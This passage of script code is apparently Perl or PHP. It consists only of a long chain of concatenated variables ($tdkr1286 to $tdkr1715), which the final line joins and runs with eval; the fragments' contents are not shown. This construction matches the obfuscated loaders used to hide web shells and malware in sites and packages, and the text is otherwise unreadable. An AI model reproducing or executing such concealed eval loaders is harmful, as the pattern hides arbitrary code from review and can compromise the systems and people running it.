$tdkr1286.$tdkr1287.
$tdkr1288.$tdkr1289.$tdkr1290.$tdkr1291.$tdkr1292.
$tdkr1293.
$tdkr1294.$tdkr1295.
$tdkr1296.$tdkr1297.$tdkr1298.$tdkr1299.
$tdkr1300.
$tdkr1301.$tdkr1302.$tdkr1303.$tdkr1304.$tdkr1305.$tdkr1306.$tdkr1307.$tdkr1308.$tdkr1309.
$tdkr1310.$tdkr1311.$tdkr1312.$tdkr1313.$tdkr1314.
$tdkr1315.$tdkr1316.$tdkr1317.$tdkr1318.$tdkr1319.$tdkr1320.
$tdkr1321.$tdkr1322.$tdkr1323.$tdkr1324.
$tdkr1325.$tdkr1326.$tdkr1327.$tdkr1328.$tdkr1329.$tdkr1330.$tdkr1331.$tdkr1332.
$tdkr1333.$tdkr1334.$tdkr1335.$tdkr1336.$tdkr1337.$tdkr1338.$tdkr1339.$tdkr1340.$tdkr1341.$tdkr1342.
$tdkr1343.$tdkr1344.$tdkr1345.$tdkr1346.$tdkr1347.$tdkr1348.$tdkr1349.$tdkr1350.$tdkr1351.$tdkr1352.$tdkr1353.$tdkr1354.$tdkr1355.$tdkr1356.$tdkr1357.$tdkr1358.$tdkr1359.$tdkr1360.$tdkr1361.$tdkr1362.
$tdkr1363.$tdkr1364.$tdkr1365.$tdkr1366.$tdkr1367.$tdkr1368.
$tdkr1369.$tdkr1370.$tdkr1371.$tdkr1372.$tdkr1373.$tdkr1374.$tdkr1375.$tdkr1376.$tdkr1377.$tdkr1378.$tdkr1379.$tdkr1380.$tdkr1381.$tdkr1382.$tdkr1383.$tdkr1384.
$tdkr1385.$tdkr1386.$tdkr1387.$tdkr1388.$tdkr1389.$tdkr1390.$tdkr1391.$tdkr1392.
$tdkr1393.
$tdkr1394.$tdkr1395.$tdkr1396.$tdkr1397.$tdkr1398.$tdkr1399.$tdkr1400.
$tdkr1401.
$tdkr1402.
$tdkr1403.$tdkr1404.$tdkr1405.$tdkr1406.
$tdkr1407.$tdkr1408.$tdkr1409.$tdkr1410.$tdkr1411.$tdkr1412.$tdkr1413.$tdkr1414.
$tdkr1415.$tdkr1416.$tdkr1417.$tdkr1418.$tdkr1419.$tdkr1420.$tdkr1421.$tdkr1422.$tdkr1423.$tdkr1424.
$tdkr1425.
$tdkr1426.$tdkr1427.$tdkr1428.$tdkr1429.$tdkr1430.$tdkr1431.
$tdkr1432.
$tdkr1433.$tdkr1434.
$tdkr1435.$tdkr1436.$tdkr1437.$tdkr1438.$tdkr1439.$tdkr1440.
$tdkr1441.$tdkr1442.$tdkr1443.$tdkr1444.
$tdkr1445.$tdkr1446.$tdkr1447.$tdkr1448.$tdkr1449.
$tdkr1450.$tdkr1451.$tdkr1452.$tdkr1453.$tdkr1454.$tdkr1455.$tdkr1456.$tdkr1457.$tdkr1458.
$tdkr1459.$tdkr1460.$tdkr1461.$tdkr1462.
$tdkr1463.
$tdkr1464.$tdkr1465.$tdkr1466.$tdkr1467.$tdkr1468.$tdkr1469.$tdkr1470.
$tdkr1471.$tdkr1472.$tdkr1473.$tdkr1474.$tdkr1475.$tdkr1476.$tdkr1477.
$tdkr1478.$tdkr1479.$tdkr1480.$tdkr1481.$tdkr1482.$tdkr1483.$tdkr1484.$tdkr1485.$tdkr1486.$tdkr1487.$tdkr1488.
$tdkr1489.$tdkr1490.$tdkr1491.$tdkr1492.
$tdkr1493.$tdkr1494.$tdkr1495.$tdkr1496.$tdkr1497.$tdkr1498.
$tdkr1499.$tdkr1500.$tdkr1501.$tdkr1502.$tdkr1503.$tdkr1504.
$tdkr1505.$tdkr1506.$tdkr1507.$tdkr1508.$tdkr1509.$tdkr1510.
$tdkr1511.$tdkr1512.$tdkr1513.$tdkr1514.$tdkr1515.$tdkr1516.$tdkr1517.$tdkr1518.$tdkr1519.$tdkr1520.
$tdkr1521.$tdkr1522.$tdkr1523.$tdkr1524.
$tdkr1525.$tdkr1526.$tdkr1527.$tdkr1528.$tdkr1529.$tdkr1530.
$tdkr1531.$tdkr1532.
$tdkr1533.$tdkr1534.$tdkr1535.$tdkr1536.$tdkr1537.$tdkr1538.$tdkr1539.$tdkr1540.
$tdkr1541.$tdkr1542.$tdkr1543.$tdkr1544.$tdkr1545.$tdkr1546.$tdkr1547.$tdkr1548.$tdkr1549.$tdkr1550.$tdkr1551.$tdkr1552.$tdkr1553.
$tdkr1554.$tdkr1555.$tdkr1556.
$tdkr1557.
$tdkr1558.
$tdkr1559.$tdkr1560.
$tdkr1561.$tdkr1562.$tdkr1563.$tdkr1564.$tdkr1565.$tdkr1566.$tdkr1567.$tdkr1568.$tdkr1569.$tdkr1570.$tdkr1571.$tdkr1572.$tdkr1573.$tdkr1574.$tdkr1575.
$tdkr1576.$tdkr1577.$tdkr1578.$tdkr1579.$tdkr1580.
$tdkr1581.$tdkr1582.$tdkr1583.$tdkr1584.
$tdkr1585.$tdkr1586.$tdkr1587.$tdkr1588.$tdkr1589.$tdkr1590.
$tdkr1591.$tdkr1592.$tdkr1593.$tdkr1594.$tdkr1595.
$tdkr1596.$tdkr1597.$tdkr1598.$tdkr1599.
$tdkr1600.$tdkr1601.$tdkr1602.$tdkr1603.$tdkr1604.$tdkr1605.$tdkr1606.
$tdkr1607.$tdkr1608.
$tdkr1609.$tdkr1610.$tdkr1611.$tdkr1612.$tdkr1613.$tdkr1614.$tdkr1615.
$tdkr1616.$tdkr1617.$tdkr1618.$tdkr1619.$tdkr1620.
$tdkr1621.$tdkr1622.$tdkr1623.$tdkr1624.
$tdkr1625.$tdkr1626.$tdkr1627.$tdkr1628.$tdkr1629.$tdkr1630.$tdkr1631.$tdkr1632.$tdkr1633.$tdkr1634.$tdkr1635.
$tdkr1636.$tdkr1637.$tdkr1638.
$tdkr1639.$tdkr1640.
$tdkr1641.$tdkr1642.$tdkr1643.$tdkr1644.$tdkr1645.
$tdkr1646.$tdkr1647.$tdkr1648.$tdkr1649.$tdkr1650.$tdkr1651.$tdkr1652.$tdkr1653.$tdkr1654.$tdkr1655.$tdkr1656.
$tdkr1657.$tdkr1658.$tdkr1659.$tdkr1660.$tdkr1661.$tdkr1662.
$tdkr1663.$tdkr1664.
$tdkr1665.
$tdkr1666.$tdkr1667.$tdkr1668.$tdkr1669.$tdkr1670.
$tdkr1671.$tdkr1672.
$tdkr1673.$tdkr1674.$tdkr1675.$tdkr1676.$tdkr1677.$tdkr1678.$tdkr1679.$tdkr1680.
$tdkr1681.$tdkr1682.$tdkr1683.$tdkr1684.
$tdkr1685.$tdkr1686.$tdkr1687.$tdkr1688.$tdkr1689.$tdkr1690.$tdkr1691.$tdkr1692.$tdkr1693.$tdkr1694.$tdkr1695.$tdkr1696.
$tdkr1697.$tdkr1698.$tdkr1699.$tdkr1700.
$tdkr1701.$tdkr1702.$tdkr1703.$tdkr1704.$tdkr1705.$tdkr1706.
$tdkr1707.$tdkr1708.$tdkr1709.$tdkr1710.$tdkr1711.$tdkr1712.$tdkr1713.$tdkr1714.$tdkr1715;$c='tdkr';eval $tdkr;